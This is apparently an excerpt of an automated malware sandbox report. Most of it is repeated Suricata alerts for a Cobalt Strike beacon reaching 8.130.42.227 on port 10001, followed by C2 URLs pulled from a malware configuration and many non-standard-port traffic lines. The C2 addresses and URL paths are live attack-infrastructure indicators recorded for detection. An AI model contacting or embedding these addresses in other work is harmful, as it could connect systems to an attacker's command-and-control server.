            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49908 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49850 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49938 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49889 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49926 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49929 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49880 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49846 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49939 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49896 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49830 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49812 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49934 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49853 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49915 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49861 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49906 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49872 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49910 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49893 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49754 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49916 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49920 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49932 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49925 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49761 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49791 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49806 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49815 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49813 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49776 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49825 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49831 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49901 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49911 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49778 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49849 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49864 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49811 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49842 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49854 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49918 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49937 -> 8.130.42.227:10001
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://8.130.42.227:10001/2yMe
            Source: Malware configuration extractorURLs: http://8.130.42.227/2yMe
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49851
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49860
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49864
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49866
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49867
            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49868
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49872
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49872
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49876
            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49877
            Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49879
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49880
            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49881
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49882
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49885
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49888
            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49889
            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49890
            Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49891
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49892
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49894
            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 10001
